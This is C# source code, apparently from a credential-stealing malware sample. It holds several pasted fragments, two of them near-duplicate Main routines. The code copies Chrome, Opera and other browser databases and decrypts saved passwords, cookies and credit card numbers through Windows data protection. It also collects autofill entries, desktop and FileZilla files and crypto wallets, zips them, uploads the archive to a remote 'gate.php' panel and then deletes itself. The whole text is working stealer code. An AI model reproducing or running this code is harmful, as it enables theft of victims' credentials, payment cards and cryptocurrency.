public static List <CookieData> GetCookies() // Works { List <CookieData> cookieDataList1 = new List <CookieData>(); string environmentVariable = Environment.GetEnvironmentVariable("LocalAppData"); string[] strArray = new string[7] { environmentVariable + "\\Google\\Chrome\\User Data\\Default\\Cookies", Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Opera Software\\Opera Stable\\Cookies", environmentVariable + "\\Kometa\\User Data\\Default\\Cookies", environmentVariable + "\\Orbitum\\User Data\\Default\\Cookies", environmentVariable + "\\Comodo\\Dragon\\User Data\\Default\\Cookies", environmentVariable + "\\Amigo\\User\\User Data\\Default\\Cookies", environmentVariable + "\\Torch\\User Data\\Default\\Cookies" }; foreach (string basePath in strArray) { List <CookieData> cookieDataList2 = Browsers.FetchCookies(basePath); if (cookieDataList2 != null) { cookieDataList1.AddRange((IEnumerable <CookieData>)cookieDataList2); } } return(cookieDataList1); }
private static void Main(string[] args) { string dir = Environment.GetEnvironmentVariable("temp") + @"\" + Helper.GetHwid(); string path = dir + @"\Directory"; string str3 = path + @"\Browsers"; string str4 = path + @"\Files"; string str5 = path + @"\Wallets"; Directory.CreateDirectory(path); Directory.CreateDirectory(str3); Directory.CreateDirectory(str4); Directory.CreateDirectory(str5); string contents = ""; List <PassData> passwords = Browsers.GetPasswords(); foreach (PassData data in passwords) { contents = contents + data.ToString(); } File.WriteAllText(str3 + @"\Passwords.txt", contents); contents = ""; List <CookieData> cookies = Browsers.GetCookies(); foreach (CookieData data2 in cookies) { contents = contents + data2.ToString(); } File.WriteAllText(str3 + @"\Cookies.txt", contents); contents = ""; List <CardData> cards = Browsers.GetCards(); foreach (CardData data3 in cards) { contents = contents + data3.ToString(); } File.WriteAllText(str3 + @"\CC.txt", contents); contents = ""; List <FormData> forms = Browsers.GetForms(); foreach (FormData data4 in forms) { contents = contents + data4.ToString(); } File.WriteAllText(str3 + @"\Autofill.txt", contents); contents = ""; Files.Desktop(str4); Files.FileZilla(str4); int num = Crypto.Steal(str5); string zipPath = dir + @"\" + Helper.GetHwid() + ".zip"; Helper.Zip(path, zipPath); Helper.SendFile(string.Format(url + "/gate.php?hwid={0}&pwd={1}&cki={2}&cc={3}&frm={4}&wlt={5}", new object[] { Helper.GetHwid(), passwords.Count, cookies.Count, cards.Count, forms.Count, num }), zipPath); Helper.SelfDelete(dir, dir + @"\temp.exe"); }
static void Main(string[] args) { string dir = Environment.GetEnvironmentVariable("temp") + "\\" + Helper.GetHwid(); string workDir = dir + "\\Directory"; string browserDir = workDir + "\\Browsers"; string filesDir = workDir + "\\Files"; string cryptoDir = workDir + "\\Wallets"; Directory.CreateDirectory(workDir); Directory.CreateDirectory(browserDir); Directory.CreateDirectory(filesDir); Directory.CreateDirectory(cryptoDir); bool bl = false; string text = ""; List <PassData> pwd = Browsers.GetPasswords(); foreach (PassData i in pwd) { text += i.ToString(); } File.WriteAllText(browserDir + "\\Passwords.txt", text); text = ""; List <CookieData> cki = Browsers.GetCookies(); foreach (CookieData i in cki) { text += i.ToString(); } File.WriteAllText(browserDir + "\\Cookies.txt", text); text = ""; List <CardData> cc = Browsers.GetCards(); foreach (CardData i in cc) { text += i.ToString(); } File.WriteAllText(browserDir + "\\CC.txt", text); text = ""; List <FormData> frm = Browsers.GetForms(); foreach (FormData i in frm) { text += i.ToString(); } File.WriteAllText(browserDir + "\\Autofill.txt", text); text = ""; Files.Desktop(filesDir); Files.FileZilla(filesDir); int wlt = Crypto.Steal(cryptoDir); string zipName = dir + "\\" + Helper.GetHwid() + ".zip"; Helper.Zip(workDir, zipName); Helper.SendFile(string.Format(url + "/gate.php?hwid={0}&pwd={1}&cki={2}&cc={3}&frm={4}&wlt={5}", Helper.GetHwid(), pwd.Count, cki.Count, cc.Count, frm.Count, wlt), zipName); Helper.SelfDelete(dir, dir + "\\temp.exe"); // //Console.ReadKey(); }
private static List <CardData> FetchCards(string basePath) { if (!File.Exists(basePath)) { return((List <CardData>)null); } string str1 = ""; if (basePath.Contains("Chrome")) { str1 = "Google Chrome"; } if (basePath.Contains("Yandex")) { str1 = "Yandex Browser"; } if (basePath.Contains("Orbitum")) { str1 = "Orbitum Browser"; } if (basePath.Contains("Opera")) { str1 = "Opera Browser"; } if (basePath.Contains("Amigo")) { str1 = "Amigo Browser"; } if (basePath.Contains("Torch")) { str1 = "Torch Browser"; } if (basePath.Contains("Comodo")) { str1 = "Comodo Browser"; } try { string str2 = Path.GetTempPath() + "/" + Helper.GetRandomString() + ".fv"; if (File.Exists(str2)) { File.Delete(str2); } File.Copy(basePath, str2, true); SqlHandler sqlHandler = new SqlHandler(str2); List <CardData> cardDataList = new List <CardData>(); sqlHandler.ReadTable("credit_cards"); /* * if (sqlHandler.GetRowCount() == 65536) * return (List<CardData>)null;*/ for (int rowNum = 0; rowNum < sqlHandler.GetRowCount(); ++rowNum) { try { string empty = string.Empty; try { empty = Encoding.UTF8.GetString(Browsers.DecryptBrowsers(Encoding.Default.GetBytes(sqlHandler.GetValue(rowNum, 4)), (byte[])null)); } catch (Exception ex) { // //Console.WriteLine(ex.ToString()); } if (empty != "") { cardDataList.Add(new CardData() { Name = sqlHandler.GetValue(rowNum, 1), Exp_m = sqlHandler.GetValue(rowNum, 2), Exp_y = sqlHandler.GetValue(rowNum, 3), Number = empty, Billing = sqlHandler.GetValue(rowNum, 9) }); } } catch (Exception ex) { // //Console.WriteLine(ex.ToString()); } } File.Delete(str2); return(cardDataList); } catch (Exception ex) { // //Console.WriteLine(ex.ToString()); return((List <CardData>)null); } }
private static List <CookieData> FetchCookies(string basePath) { if (!File.Exists(basePath)) { return((List <CookieData>)null); } string str1 = ""; if (basePath.Contains("Chrome")) { str1 = "Google Chrome"; } if (basePath.Contains("Yandex")) { str1 = "Yandex Browser"; } if (basePath.Contains("Orbitum")) { str1 = "Orbitum Browser"; } if (basePath.Contains("Opera")) { str1 = "Opera Browser"; } if (basePath.Contains("Amigo")) { str1 = "Amigo Browser"; } if (basePath.Contains("Torch")) { str1 = "Torch Browser"; } if (basePath.Contains("Comodo")) { str1 = "Comodo Browser"; } try { string str2 = Path.GetTempPath() + "/" + Helper.GetRandomString() + ".fv"; if (File.Exists(str2)) { File.Delete(str2); } File.Copy(basePath, str2, true); SqlHandler sqlHandler = new SqlHandler(str2); /*if (sqlHandler.GetRowCount() == 65536) * return (List<CookieData>)null;*/ List <CookieData> cookieDataList = new List <CookieData>(); sqlHandler.ReadTable("cookies"); for (int rowNum = 0; rowNum < sqlHandler.GetRowCount(); ++rowNum) { try { string empty = string.Empty; try { empty = Encoding.UTF8.GetString(Browsers.DecryptBrowsers(Encoding.Default.GetBytes(sqlHandler.GetValue(rowNum, 12)), (byte[])null)); } catch (Exception ex) { // // //Console.WriteLine(ex.ToString()); } if (empty != "") { cookieDataList.Add(new CookieData() { host_key = sqlHandler.GetValue(rowNum, 1), name = sqlHandler.GetValue(rowNum, 2), path = sqlHandler.GetValue(rowNum, 4), expires_utc = sqlHandler.GetValue(rowNum, 5), secure = sqlHandler.GetValue(rowNum, 6), value = empty, }); } } catch (Exception ex) { // // //Console.WriteLine(ex.ToString()); } } File.Delete(str2); return(cookieDataList); } catch (Exception ex) { // //Console.WriteLine(ex.ToString()); return((List <CookieData>)null); } }
private static List <PassData> FetchPasswords(string basePath) { if (!File.Exists(basePath)) { return((List <PassData>)null); } string str1 = ""; if (basePath.Contains("Chrome")) { str1 = "Google Chrome"; } if (basePath.Contains("Yandex")) { str1 = "Yandex Browser"; } if (basePath.Contains("Orbitum")) { str1 = "Orbitum Browser"; } if (basePath.Contains("Opera")) { str1 = "Opera Browser"; } if (basePath.Contains("Amigo")) { str1 = "Amigo Browser"; } if (basePath.Contains("Torch")) { str1 = "Torch Browser"; } if (basePath.Contains("Comodo")) { str1 = "Comodo Browser"; } try { string str2 = Path.GetTempPath() + "/" + Helper.GetRandomString() + ".fv"; if (File.Exists(str2)) { File.Delete(str2); } File.Copy(basePath, str2, true); SqlHandler sqlHandler = new SqlHandler(str2); List <PassData> passDataList = new List <PassData>(); sqlHandler.ReadTable("logins"); for (int rowNum = 0; rowNum < sqlHandler.GetRowCount(); ++rowNum) { try { string empty = string.Empty; try { empty = Encoding.UTF8.GetString(Browsers.DecryptBrowsers(Encoding.Default.GetBytes(sqlHandler.GetValue(rowNum, 5)), (byte[])null)); } catch (Exception ex) { } if (empty != "") { passDataList.Add(new PassData() { Url = sqlHandler.GetValue(rowNum, 1).Replace("https://", "").Replace("http://", ""), Login = sqlHandler.GetValue(rowNum, 3), Password = empty, Program = str1 }); } } catch (Exception ex) { // // //Console.WriteLine(ex.ToString()); } } File.Delete(str2); return(passDataList); } catch (Exception ex) { // // //Console.WriteLine(ex.ToString()); return((List <PassData>)null); } }
public static byte[] DecryptBrowsers(byte[] cipherTextBytes, byte[] entropyBytes = null) { Browsers.DataBlob pPlainText = new Browsers.DataBlob(); Browsers.DataBlob pCipherText = new Browsers.DataBlob(); Browsers.DataBlob pEntropy = new Browsers.DataBlob(); Browsers.CryptprotectPromptstruct pPrompt = new Browsers.CryptprotectPromptstruct() { cbSize = Marshal.SizeOf(typeof(Browsers.CryptprotectPromptstruct)), dwPromptFlags = 0, hwndApp = IntPtr.Zero, szPrompt = (string)null }; string empty = string.Empty; try { try { if (cipherTextBytes == null) { cipherTextBytes = new byte[0]; } pCipherText.pbData = Marshal.AllocHGlobal(cipherTextBytes.Length); pCipherText.cbData = cipherTextBytes.Length; Marshal.Copy(cipherTextBytes, 0, pCipherText.pbData, cipherTextBytes.Length); } catch (Exception ex) { } try { if (entropyBytes == null) { entropyBytes = new byte[0]; } pEntropy.pbData = Marshal.AllocHGlobal(entropyBytes.Length); pEntropy.cbData = entropyBytes.Length; Marshal.Copy(entropyBytes, 0, pEntropy.pbData, entropyBytes.Length); } catch (Exception ex) { } Browsers.CryptUnprotectData(ref pCipherText, ref empty, ref pEntropy, IntPtr.Zero, ref pPrompt, 1, ref pPlainText); byte[] destination = new byte[pPlainText.cbData]; Marshal.Copy(pPlainText.pbData, destination, 0, pPlainText.cbData); return(destination); } catch (Exception ex) { } finally { if (pPlainText.pbData != IntPtr.Zero) { Marshal.FreeHGlobal(pPlainText.pbData); } if (pCipherText.pbData != IntPtr.Zero) { Marshal.FreeHGlobal(pCipherText.pbData); } if (pEntropy.pbData != IntPtr.Zero) { Marshal.FreeHGlobal(pEntropy.pbData); } } return(new byte[0]); }